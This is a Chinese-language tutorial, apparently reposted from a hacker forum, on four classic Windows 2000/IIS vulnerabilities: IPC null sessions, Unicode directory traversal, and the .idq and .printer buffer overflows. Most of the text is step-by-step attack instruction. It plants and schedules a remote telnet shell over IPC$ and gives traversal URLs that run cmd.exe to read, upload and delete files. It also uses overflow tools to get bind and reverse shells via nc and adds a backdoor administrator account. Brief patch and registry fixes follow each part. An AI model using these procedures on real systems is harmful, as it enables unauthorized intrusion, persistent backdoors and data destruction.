[其他]：微软Windows 2000系统经典漏洞大阅兵

ctiger

Windows2000是当前最流行的操作系统之一，所以它的安全性绝对不容忽视。这里详细介绍IPC空连接、Unicode漏洞、*.idq漏洞和*.printer漏洞。

　　IPC空连接漏洞：

　　IPC是共享“命名管道”的资源，它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。利用IPC我们可以与目标主机建立一个空的连接，而利用这个空的连接，我们还可以得到目标主机上的用户列表。

我们首先用流光随便扫一个网段，比如扫到IP：202.1.1.1存在administrator组用户admin，密码为空。然后运行cmd.exe，输入：
c:\>net use \\202.1.1.1\ipc$ ”” /user:”admin”
此时，cmd会提示命令成功完成。这样你就和202.1.1.1建立了IPC连接。
c:\>copy server.exe \\202.1.1.1\admin$
上传server.exe到202.1.1.1的winnt目录，因为winnt目录里的东西比较多，管理员不容易发现，所以我们把server.exe上传到里面。Server.exe是janker写的winshell生成的程序，WinShell是一个运行在Windows平台上的Telnet服务器软件。
c:\>net time \\202.1.1.1
这个命令可以的到202.1.1.1的系统时间，例如是00：00
c:\>at \\202.1.1.1 00:01 ”server.exe”
cmd会提示新加了一项任务，其作业ID为1，这样远程系统会在00:01时运行server.exe。
c:\>at \\202.1.1.1 1
这样可以查看ID为1的作业情况。
c:\>net use \\202.1.1.1\ipc$ /delete
退出IPC连接。
现在，server.exe已经在远程主机上运行了。输入：
c:\>telnet 202.1.1.1 21（端口可以自己在winshell中设定）
这样就成功的telnet到202.1.1.1上了。

哎，多可怕的漏洞，修改注册表，防范IPC漏洞吧。
1. 禁止建立空连接
首先运行regedit，找到如下组建
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001。
2.禁止管理共享
同样也是找到如下组键
[HKEY_LOCAL _MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer = DWORD的键值改为:00000000。

　　Unicode漏洞：

　　微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代"/"和"＼"而能利用"../" 目录遍历的漏洞。 未经授权的用户可能利用IUSR_machinename账号的上下文空间访问任何已知 的文件。该账号在默认情况下属于Everyone 和Users组的成员，因此任何与Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都能被删除，修改或执行，就如同一个用户成功登陆所能完成的一样。同样的用流光扫一个存在unicode漏洞的IP为202.1.1.2，操作系统为win2k中文版，我们可以直接在IE浏览器的地址栏中输入：
http://202.1.1.2/scripts/..%c1%1 ... /cmd.exe?/c+dir+c:\
这样对方的c:\全在你的眼中了，更改c:\为其他路径也可以看到其他文件。
http://202.1.1.2/scripts/..%c1%1 ... pub\scripts\cmd.exe
将本地的cmd上传到远程的c:\inetpub\scripts\目录下。
http://202.1.1.2/scripts/..%c1%1 ... b\wwwroot\index.htm
删除c:\inetpub\wwwroot\index.htm，当然你也可以删除其他文件，但这里提醒大家最好不要这样做。
这个漏洞的危害虽然不能完全控制系统，但却可以删除你重要的文件的文件。以上只是举了几个unicode下的例子，可以自己举一反三的使用。

解决方案:

该漏洞补丁随微软安全公告MS00-057一起发布
(http://www.microsoft.com/technet/security/bulletin/ms00-057.asp)
可以从如下地址下载补丁:
IIS 4.0
http://www.microsoft.com/ntserve ... q269862/default.asp
IIS 5.0
http://www.microsoft.com/windows ... q269862/default.asp

　　*.idq漏洞：

IIS 在处理以".ida"为扩展名的URL请求时，它会有两种结果。 一个可能的结果是服务器回复"URL String too long"的信息；或类似"Cannot find the specified path" 的信息。另一种可能就是服务器端服务停止，并返回"Access Violation"信息(即成功的实现了对服务器端的拒绝服务攻击。
用流光扫IP，找存在*.idq漏洞的机器，例如IP：202.1.1.3存在此漏洞。这里使用snake的IIS溢出工具。
IISMiscOverflowV1_Build0010是其中图形界面的工具，在被攻击地址上填202.1.1.3，端口：80，操作系统类型选：IIS5中文win2kSp0，绑定端口813，然后按IDQ溢出。发送成功。
在cmd下输入：
c:\>nc –vv 202.1.1.3 813
202.1.1.3: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [202.1.1.3] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
没成功，我们换IIS5中文win2kSp1或win2kSp2再试试。然后同样的再输入：
c:\>nc –vv 202.1.1.3 813
202.1.1.3: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [202.1.1.3] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
这样就成功了。大多数情况下，站点很少使用扩展名为".ida"和".idq"的文件，可在ISAPI脚本映射中，将扩展名为".ida"和".idq"的应用程序映射删除。　

　　*.printer漏洞：

微软Win 2K IIS 5的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系，缺省情况下该映射存在。当远程用户提交对.printer的URL请求时，IIS 5调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查，远程用户可以提交一个精心构造的针对.printer的URL请求，其"Host:"域包含大约420字节的数据，此时在msw3prt.dll中发生典型的缓冲区溢出，潜在允许执行任意代码。溢出发生后，WEB服务停止响应，Win 2K可以检查到WEB服务停止响应，从而自动重启它，因此系统管理员很难意识到发生过攻击。
同样的，用流光扫一个存在*.printer漏洞的机器，IP：202.1.1.4
这里使用小榕的IIS5Exploit。
IIS5 .Printer Exploit 使用说明：
本程序适用于英文版IIS 5.0
1、首先在本机用NC开一个监听端口。
C:\>nc -l -p 99
2、运行IIS5Exploit
D:\>IIS5Exploit xxx.xxx.xxx.xxx 211.152.188.1 99
===========IIS5 English Version .Printer Exploit.===========
===Written by Assassin 1995-2001. http://www.netXeyes.com===
Connecting 211.152.188.1 ...OK.
Send Shell Code ...OK
IIS5 Shell Code Send OK
其中211.152.188.1指向本地IP。
稍等片刻，如果成功在本机NC舰艇的端口出现：
C:\>nc -l -p 99
Microsoft Windows 2000[Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\>
可以执行命令。如：
C:\>net user hack password /add
The command completed successfully.
C:\>net localgroup administrartors hack /add
这样就创建了一个属于Administrator组的用户Hack,密码为password.。
要解决此漏洞有两种方法1. 删除.printer扩展 2. 安装微软提供的补丁。

　　安全就是这样，只要你用心防范，破坏者就不是那么可以轻易的进入你的系统了。

——摘自：中国新青年阵线